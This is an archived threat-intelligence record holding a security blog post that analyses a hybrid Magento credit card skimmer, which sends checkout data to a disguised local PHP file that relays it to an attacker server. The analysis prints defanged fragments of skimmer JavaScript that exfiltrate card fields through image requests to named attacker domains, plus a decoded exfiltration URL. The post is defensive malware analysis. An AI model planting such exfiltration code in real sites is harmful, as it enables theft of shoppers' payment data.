{
	"id": "18cc755c-b252-4105-8229-402213a02d75",
	"created_at": "2026-04-06T00:09:29.075712Z",
	"updated_at": "2026-04-10T13:12:16.486793Z",
	"deleted_at": null,
	"sha1_hash": "977267b4fd3c42512157d7a92dc45c11c6fd186a",
	"title": "Evasion Tactics in Hybrid Credit Card Skimmers",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 224209,
	"plain_text": "Evasion Tactics in Hybrid Credit Card Skimmers\r\nBy Denis Sinegubko\r\nPublished: 2020-06-05 · Archived: 2026-04-05 22:24:55 UTC\r\nThe most common type of Magento credit card stealing malware is client-side JavaScript that grabs data entered\r\nin a checkout form and sends it to a third-party server controlled by the attackers.\r\nThough popular with bad actors, one of the drawbacks of this approach is that it’s possible to track requests to\r\nsuspicious servers if you monitor the traffic generated by checkout pages — or any other infected pages.\r\nA lesser-known, but still very popular, type of skimmer can instead be found harvesting information server-side.\r\nFor example, when hackers modify one of the core Magento PHP files or payment module files that initially get\r\nthe payment data from the checkout form. In such files, if an attacker adds a few lines of code, they’ll be able to\r\nredirect the customer information to a downloadable static file, email it, or send it to a third-party server.\r\nIn the case of server-side skimmers, the infection is absolutely invisible from the outside. There is, however, one\r\nminor issue with this approach: It’s easy to spot modifications in core or known module files.\r\nHybrid Approach\r\nIn a hybrid approach, some hacker groups employ snippets of JavaScript that sends stolen data to their own\r\nserver-side scripts on the same compromised site, essentially serving as an evasive maneuver which helps them\r\navoid visible requests to third-party servers. Requests sent to the site’s own domain are usually less scrutinized.\r\nThe server-side PHP scripts which receive the stolen information usually send it to a third-party server, which is\r\nnot detectable from the outside. The script is created in a new file with a legitimate-looking name, so that it can’t\r\nbe easily compared with the original codebase. With a bit of effort, attackers can modify their malicious code to\r\nlook quite natural and may be taken as just some benign customization.\r\nThese features allow the hybrid approach to circumvent some of the shortcomings found in both client-side and\r\nserver-side skimmers — but not all of them, however. For example, the client-side part is detectable from the\r\noutside by web page scanners, and the server-side file will most likely be reported by integrity control tools as a\r\nnew addition. Moreover, hybrid skimmers are more complex as they involve two separate parts written in two\r\ndifferent languages (usually JavaScript and PHP) and may require access to both the file system and the database.\r\nThat being said, we do come across hybrid skimmers from time to time. Let’s discuss a real world example of\r\nmalware employing this approach.\r\nClient-Side of the Hybrid Skimmer\r\nSimilar to what our team regularly finds client-side on compromised ecommerce websites, the first part of the\r\nmalware is a typical JavaScript skimmer with two layers of obfuscation:\r\nhttps://blog.sucuri.net/2020/06/evasion-tactics-in-hybrid-credit-card-skimmers.html\r\nPage 1 of 4\n\nOriginal JavaScript skimmer\r\nOnce deobfuscated, we find that it collects all the usual checkout form data such as credit card number, expiration\r\ndate, first and last names, etc. However, unlike a typical Magecart script, this skimmer sends the stolen data to a\r\nURL on the same site instead of a specialized exfiltration URL on a third-party site.\r\nSending payment data to get.php\r\nMore specifically, the script creates a new image tag with the src attribute pointing to the /get.php file on the\r\nsame compromised site. The stolen data is passed along as GET parameters to that image.\r\nServer-Side Part of the Hybrid Skimmer\r\nOf course, that /get.php file has no intention of returning a real image. All it wants to do is obtain the payment\r\ndetails from the GET request whenever a browser tries to load the fake image.\r\nIn essence, the get.php file pretends to be a legitimate file. It’s basically an old version of the index.php file from\r\nMagento 1.x with just a couple of lines of malicious code added: lines 25 and 35.\r\nhttps://blog.sucuri.net/2020/06/evasion-tactics-in-hybrid-credit-card-skimmers.html\r\nPage 2 of 4\n\nMalware at the top of an old index.php file\r\nLine 35 checks if there is a set “p” parameter of the request, then sends the value of this and the “h” parameters to\r\na third-party exfiltration URL. The address of that exfiltration server is encrypted on line 25.\r\nAfter the hex2bin decoding, “687474703a2f2f3138352e3131302e3133322e3232302f6c342e7068703f703d” turns\r\ninto “hxxp://185.110.132[.220/l4.php?p=”.\r\nPrevious Variations of Skimmers Used by the Same Bad Actors\r\nOur team also traced  more “classical” client-side skimmers back to this same server.\r\nFor example, in the jshost[.]org skimmer (2019), the decoded JavaScript malware looks very similar. It uses the\r\nsame “img” trick, with the main difference of using an external exfiltration address rather than a local address.\r\n...\r\ni=document.createElement('img');\r\ni.src='hxxps://msm.jshost[.]org/l3.php?p=222'+encodeURIComponent('\u0026fln='+fln+'\u0026ct='+ct+'\u0026cn='+cn+'\u0026ce\r\n...\r\nAn even older (2016) scriptb[.]com version of this skimmer also used the same img trick.\r\nvar i = document.createElement('img');\r\ni.src = 'hxxps://scriptb[.]com/l2.php?p=197' + encodeURIComponent('\u0026fln=' + fln + '\u0026ct=' + ct + '\u0026cn=\r\nBoth jshost[.]org and scriptb[.]com domains pointed to the same 185.110.132.220 server in Russia.\r\nSince 2016, this very server has employed the exact same exfiltration filenames including l.php, l2.php, l3.php,\r\nl4.php.\r\nIf you try to open the files in a browser, you’ll find a regular 404 page. However, when you request any other URL\r\nthat really shouldn’t be on the server, you’ll get a slightly different 404 page, proving that the 404 response for\r\nthese malicious l.php pages is fake.\r\nConclusion\r\nhttps://blog.sucuri.net/2020/06/evasion-tactics-in-hybrid-credit-card-skimmers.html\r\nPage 3 of 4\n\nWeb skimmer authors are constantly testing new ways to circumnavigate detection and conceal their malware\r\nwithin compromised systems. To accomplish this and effectively harvest stolen data, one technique has been\r\ntrending in credit card stealing malware: a hybrid approach, which sends stolen data to their own server-side\r\nscripts on the same compromised site.\r\nFor webmasters, this means it’s really important that you are thorough during the cleanup process when reviewing\r\nand removing malware reported by external scanners. There may be server-side parts of the credit card skimmer\r\nstill lurking on the site. File system integrity controls can be helpful for locating recently added or modified files.\r\nSource: https://blog.sucuri.net/2020/06/evasion-tactics-in-hybrid-credit-card-skimmers.html\r\nhttps://blog.sucuri.net/2020/06/evasion-tactics-in-hybrid-credit-card-skimmers.html\r\nPage 4 of 4",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blog.sucuri.net/2020/06/evasion-tactics-in-hybrid-credit-card-skimmers.html"
	],
	"report_names": [
		"evasion-tactics-in-hybrid-credit-card-skimmers.html"
	],
	"threat_actors": [
		{
			"id": "5a0483f5-09b3-4673-bb5a-56d41eaf91ed",
			"created_at": "2023-01-06T13:46:38.814104Z",
			"updated_at": "2026-04-10T02:00:03.110104Z",
			"deleted_at": null,
			"main_name": "MageCart",
			"aliases": [],
			"source_name": "MISPGALAXY:MageCart",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "3fad11c6-4336-4b28-a606-f510eca5452e",
			"created_at": "2022-10-25T16:07:24.346573Z",
			"updated_at": "2026-04-10T02:00:04.948823Z",
			"deleted_at": null,
			"main_name": "Turbine Panda",
			"aliases": [
				"APT 26",
				"Black Vine",
				"Bronze Express",
				"Group 13",
				"JerseyMikes",
				"KungFu Kittens",
				"PinkPanther",
				"Shell Crew",
				"Taffeta Typhoon",
				"Turbine Panda",
				"WebMasters"
			],
			"source_name": "ETDA:Turbine Panda",
			"tools": [
				"Agent.dhwf",
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"Derusbi",
				"Destroy RAT",
				"DestroyRAT",
				"FF-RAT",
				"FormerFirstRAT",
				"Hurix",
				"Kaba",
				"Korplug",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Mivast",
				"PlugX",
				"RbDoor",
				"RedDelta",
				"RibDoor",
				"Sakula",
				"Sakula RAT",
				"Sakurel",
				"Sogu",
				"StreamEx",
				"TIGERPLUG",
				"TVT",
				"Thoper",
				"Winnti",
				"Xamtrav",
				"cobeacon",
				"ffrat"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434169,
	"ts_updated_at": 1775826736,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/977267b4fd3c42512157d7a92dc45c11c6fd186a.pdf",
		"text": "https://archive.orkl.eu/977267b4fd3c42512157d7a92dc45c11c6fd186a.txt",
		"img": "https://archive.orkl.eu/977267b4fd3c42512157d7a92dc45c11c6fd186a.jpg"
	}
}